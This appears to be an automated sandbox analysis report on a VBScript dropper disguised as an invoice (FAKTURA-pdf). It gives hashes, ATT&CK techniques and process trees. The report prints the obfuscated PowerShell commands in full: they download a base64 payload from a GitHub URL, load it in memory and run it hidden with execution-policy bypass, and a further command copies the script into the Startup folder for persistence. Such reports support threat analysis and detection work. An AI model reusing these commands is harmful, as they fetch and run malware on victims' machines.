07565a7b310e8082d9cfdaea1f0990c5b21ec6c08001272414cf63869019aa24

General

Target

FAKTURA-pdf-466366332.vbs
Size

484KB
MD5

90bd9fa957050b3641726fd4bb173281
SHA1

4fd94ee79b46a075b9cc10f9ceecaad705a19bf8
SHA256

07565a7b310e8082d9cfdaea1f0990c5b21ec6c08001272414cf63869019aa24
SHA512

769ec466d81b2fdc7e19741c0b71b41be1e746a0b582ff5913148b40993e7f6ab074ff73e44f4392bead209bba98a819cffaf4e8469ef44beaf1d54d435d1099
SSDEEP

12288:fCQNJjr/mJJw5NbHSoBFy8oJTaaPlI7lyxeBs9YVYzGqsYBnwhRD8PHNUvvtCC+y:46E9qAPuVb

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2692	powershell.exe
6	2692	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2608	powershell.exe
2648	powershell.exe
2692	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mocidade.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mocidade.vbs	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2304	cmd.exe
2300	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2300	PING.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2608	powershell.exe
2648	powershell.exe
2692	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2600 wrote to memory of 2304	2600	WScript.exe	30
PID 2600 wrote to memory of 2304	2600	WScript.exe	30
PID 2600 wrote to memory of 2304	2600	WScript.exe	30
PID 2304 wrote to memory of 2300	2304	cmd.exe	32
PID 2304 wrote to memory of 2300	2304	cmd.exe	32
PID 2304 wrote to memory of 2300	2304	cmd.exe	32
PID 2304 wrote to memory of 2608	2304	cmd.exe	34
PID 2304 wrote to memory of 2608	2304	cmd.exe	34
PID 2304 wrote to memory of 2608	2304	cmd.exe	34
PID 2600 wrote to memory of 2648	2600	WScript.exe	35
PID 2600 wrote to memory of 2648	2600	WScript.exe	35
PID 2600 wrote to memory of 2648	2600	WScript.exe	35
PID 2648 wrote to memory of 2692	2648	powershell.exe	37
PID 2648 wrote to memory of 2692	2648	powershell.exe	37
PID 2648 wrote to memory of 2692	2648	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FAKTURA-pdf-466366332.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2600
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
807b24f47b8383acd1c0d4130938c0da

SHA1
dce510f3cd9f4bd9fe0537d17697fcaf3328492c

SHA256
d0cccb12a38cdb54d65a394d312f3138f7481b487773768f65de1c095d2e7db0

SHA512
b0ce5025ae9ee9bc568812f6afc28b982221d9e37cf9445197a399518246794138fa20b2b190efbc0fe7295ec76156615cf510f30189e79b78a3c57b9c09d40d

Download Submit
memory/2608-5-0x000007FEF564E000-0x000007FEF564F000-memory.dmp

Filesize
4KB

Download
memory/2608-6-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/2608-7-0x00000000026E0000-0x00000000026E8000-memory.dmp

Filesize
32KB

Download
memory/2608-8-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

Filesize
9.6MB

Download
memory/2608-9-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

Filesize
9.6MB

Download
memory/2608-10-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

Filesize
9.6MB

Download
memory/2608-11-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

Filesize
9.6MB

Download
memory/2608-12-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

Filesize
9.6MB

Download
memory/2608-13-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

Filesize
9.6MB

Download
memory/2648-19-0x000000001B420000-0x000000001B702000-memory.dmp

Filesize
2.9MB

Download
memory/2648-20-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing